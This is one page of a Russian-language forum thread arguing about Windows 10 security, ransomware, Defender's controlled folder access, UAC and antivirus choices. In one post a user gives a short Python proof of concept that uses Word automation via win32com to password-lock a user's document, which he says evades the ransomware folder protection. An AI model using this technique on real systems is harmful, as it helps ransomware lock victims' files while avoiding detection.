Часовой пояс: UTC + 3 часа




Форум закрыт Новая тема / Эта тема закрыта, вы не можете редактировать и оставлять сообщения в ней. Закрыто  Сообщений: 74 • Страница 4 из 4<  1  2  3  4
  Пред. тема | След. тема 
В случае проблем с отображением форума, отключите блокировщик рекламы
Автор Сообщение
 

Member
Статус: Не в сети
Регистрация: 20.02.2007
Откуда: Москва
Zystax писал(а):
шифровальщикам, криптомайнерам и т д...


шифровальщики и криптомайнеры отлично работают и на вин10 . потому что программа обращающаяся к файлам в пределах своей компетенции это ниразу не вирус . вот winrar же не вирус ? и шифровальщиков тот же самый порядок действий .



Партнер
 

Member
Статус: Не в сети
Регистрация: 04.10.2014
Фото: 0
mo3ulla писал(а):
шифровальщики и криптомайнеры отлично работают и на вин10 . потому что программа обращающаяся к файлам в пределах своей компетенции это ниразу не вирус . вот winrar же не вирус ? и шифровальщиков тот же самый порядок действий .

Цитата:
"Контролируемый доступ к папкам" - новая функция Защитника Windows, доступная в Windows 10 Fall Creators Update (версия 1709), которая позволяет защищать файлы и папки от действия шифровальщиков и других угроз

Уже 1.5 года как системные папки защищены по дефолту, пользовательские по желанию...


 

Member
Статус: Не в сети
Регистрация: 20.02.2007
Откуда: Москва
Zystax писал(а):
Уже 1.5 года как системные папки защищены по дефолту, пользовательские по желанию...

эта хрень часть виндовз дефендера . которая пытается найти в ехешнике всякие ключевые слова которые могут говорить о его намерениях .а также на базе сигнатур того же дефендера.и немного поведенческого анализа . в реале его уже играючи поимели (внезапно да?) https://www.securityweek.com/windows-10 ... rcher-says . причем криптор написаный для обхода защитника windows отлично будет работать на любых ос

Добавлено спустя 3 минуты 18 секунд:
причем мс когда рассказали что их exploit protection . мягко сказать не работает . написали что они не считают предложенный обход проблемой . ну да конечно
#77

Добавлено спустя 1 минуту 50 секунд:

как POC предлагается код на питоне . написаный на коленке
file = open('C:/Users/YJ/Documents/test.docx','w')
file.write('Random text.')
file.close()

защитник сработает . хотя если код модифицировать в

import win32com.client
filetoberansom = r'C:/Users/YJ/Documents/test.docx'
word = win32com.client.Dispatch("Word.Application")
word.visible = 0
doc = word.Documents.Open(filetoberansom)
word.Documents.Item(1).Password= '12345678'
word.Documents.Item(1).Save()
word.Documents.Item(1).Close()
word.Application.Quit()

проблем нет .. :D .если нада можно и более изящно это написать . подтянув через OLE вообще что угодно .


 

Member
Статус: Не в сети
Регистрация: 30.12.2008
Откуда: Пушкино
Фото: 0
mo3ulla писал(а):
эта хрень часть виндовз дефендера . которая пытается найти в ехешнике всякие ключевые слова которые могут говорить о его намерениях

а не та вещь которая уже с выхода висты есть, которая срет на всех ехе ставя свой значок щита?
если сразу не отключить его.

_________________
Intel Core i7 13700K + MSI NVIDIA GeForce RTX 4080 SUPER


Последний раз редактировалось Spiteful Mouse 11.03.2019 10:03, всего редактировалось 1 раз.

 

Member
Статус: Не в сети
Регистрация: 04.10.2014
Фото: 0
mo3ulla писал(а):
эта хрень часть виндовз дефендера . которая пытается найти в ехешнике всякие ключевые слова которые могут говорить о его намерениях .а также на базе сигнатур того же дефендера.и немного поведенческого анализа . в реале его уже играючи поимели (внезапно да?) https://www.securityweek.com/windows-10 ... rcher-says . причем криптор написаный для обхода защитника windows отлично будет работать на любых ос

причем мс когда рассказали что их exploit protection . мягко сказать не работает . написали что они не считают предложенный обход проблемой . ну да конечно

А какая альтернатива? Касперский с контролем папок?


 

Member
Статус: Не в сети
Регистрация: 19.03.2004
Откуда: Томск
Фото: 1
Опричник писал(а):
Мне обновления тоже не впёрлись. Как сидел на вин7 с обновами по 16 год, так и сижу.

когда утянут у тебя файл блокнота с паролями :D тогда вспомнишь. (например через свежую дыру в хроме + 7 )
у таких дурачков и воруют акки от стима, танков и т.д. а потом продают на плати.
или очередной ваннакрай зашифрует тебе весь винт


 

Member
Статус: Не в сети
Регистрация: 02.10.2005
Откуда: Россия
Фото: 4
Незваный Гость писал(а):
когда утянут у тебя файл блокнота с паролями :D тогда вспомнишь. (например через свежую дыру в хроме + 7 )

Для этого есть антивирус + firewall.

_________________
Руфусс про Real Temp: "Он показывает у меня 6 ядер теперь. Правда не показывает виртуальные ядра, которые тоже впринципе должны греться ..."


 

Member
Статус: Не в сети
Регистрация: 30.12.2008
Откуда: Пушкино
Фото: 0
Незваный Гость писал(а):
огда утянут у тебя файл блокнота с паролями тогда вспомнишь. (например через свежую дыру в хроме + 7 )
у таких дурачков и воруют акки от стима, танков и т.д. а потом продают на плати.
или очередной ваннакрай зашифрует тебе весь винт

сарказм? скажи что да, ты же 2004 года регистрации.

_________________
Intel Core i7 13700K + MSI NVIDIA GeForce RTX 4080 SUPER


 

Member
Статус: Не в сети
Регистрация: 18.04.2018
Откуда: Советский Союз
Фото: 0
Незваный Гость писал(а):
когда утянут у тебя файл блокнота с паролями


Пароли у меня и правда в блокноте. Только бумажном. Интересно, как они его утянут?

_________________
Конфиг в профиле.


 

Member
Статус: Не в сети
Регистрация: 20.02.2007
Откуда: Москва
Незваный Гость писал(а):
например через свежую дыру в хроме + 7

люди просматривающие пдф в браузере сами себе злобные буратины. которых не жалко вот совсем . то что пдф это расскадник вирусни даже больший чем VBA в мс офисе. известно с момента создания этого формата

Zystax писал(а):
А какая альтернатива? Касперский с контролем папок?

никакой. касперский или есет или иной платный антивирусник . лиш даст больше вариантов детектирования . больше вариантов поведенческого анализа . и тд . но если вирусняк новый и в базах его нет .. плюс пользовательского рейтинга тоже нет . то вы отлетите за милую душу абсолютно также . как и с дефендером. хотя и с меньшим шансом .


Spiteful Mouse писал(а):
а не та вещь которая уже с выхода висты есть, которая срет на всех ехе ставя свой значок щита?
если сразу не отключить его.


это UAC user account control . тот кто его отключил сознательно вышел на улицу .. нагнулся и раздвинул ягодицы ... потому что абсолютно все программы будут запущены с правами администратора .а сабж это аддон к встроенному антивируснику мс . который по идее мс должен защищать от ransomware но нифига не защищает как оказалось


 

Member
Статус: Не в сети
Регистрация: 30.12.2008
Откуда: Пушкино
Фото: 0
mo3ulla писал(а):
люди просматривающие пдф в браузере сами себе злобные буратины. которых не жалко вот совсем

:facepalm:
а может они просто обычные люди, не плохие и не хорошие?
что такого если я скачал файл и решил посмотреть его, он сразу открылся вкладкой в браузере?
я стал нубом, лохом, и буратиной?
mo3ulla писал(а):
это UAC user account control . тот кто его отключил сознательно вышел на улицу

выключен уже лет 15 :lol:
вернее выключаю в первые 10 минут после установки ос.

_________________
Intel Core i7 13700K + MSI NVIDIA GeForce RTX 4080 SUPER


 

Member
Статус: Не в сети
Регистрация: 20.02.2007
Откуда: Москва
Spiteful Mouse писал(а):
а может они просто обычные люди, не плохие и не хорошие?
что такого если я скачал файл и решил посмотреть его, он сразу открылся вкладкой в браузере?
я стал нубом, лохом, и буратиной?

незнание законов не освобождает от ответственности :D (с) УК РФ . в браузерах типа хрома никада не было отдельной песочницы и средств для работы с пдф типа защит того же adobe reader dc и foxit reader что характерно у хрома защита от вирусни в пдф еще меньше чем у EDGE :crazy: . так как у ежа дополнительный контур ввиде UWP виртуальной машины

Spiteful Mouse писал(а):
выключен уже лет 15 :lol:


ну удачи че .. у всех бывает первый раз да :crazy:


 

Junior
Статус: Не в сети
Регистрация: 07.01.2019
да вообще у маек сплошное вымогательство.
на семёрку пришлось перейти, так как хрюша32 не видит 8 гигов оперативки, и тут OOPS под 7х64 нет дров для сканера НР4004 (к слову я на нём сканировал вшу (1,5 миллиметра ростом, видно даже скелет, как под микроскопом), если документы то даже водяные знаки видно) с какого бодуна я должен платить за новое железо, с худшими параметрами и большей ценой из-за того что микрософты кушать хотят?
P.S. пришлось ставить хрюшу в виртуалке.
P.P.S. на счёт программаторов человек видимо имел в виду - для PIC, AVR, в общем для микроконтроллёров и другого ( под XP, а лучше ME эти прибамбасы делаются на коленке по себестоимости 1-2$. Покупные, с дровами под новые WIN стоят от 150$ и до совсем неприличных сумм ).

кстати я ради интереса 7ку обновил месяца 1.5 назад (у меня сборка + кмс) обновилась норм, как лицензия, но начали иногда появляться сбои при закрытии программ (дольше думать стала).
На WIN10 люди тоже жалуются - после обновлений упало FPS в играх.


 

Member
Статус: Не в сети
Регистрация: 30.09.2005
Откуда: Пермь
Фото: 10
Zystax писал(а):
А где гарантия что в них не зашито троянов и кейлоггеров?

700+ страниц обсуждения и отзывов на forum.oszone.net

_________________
Ждун 80 lvl


Показать сообщения за:  Поле сортировки  
Форум закрыт Новая тема / Эта тема закрыта, вы не можете редактировать и оставлять сообщения в ней. Закрыто  Сообщений: 74 • Страница 4 из 4<  1  2  3  4
-

Часовой пояс: UTC + 3 часа


Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 16


Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете добавлять вложения

Перейти:  
Создано на основе phpBB® Forum Software © phpBB Group
Русская поддержка phpBB | Kolobok smiles © Aiwan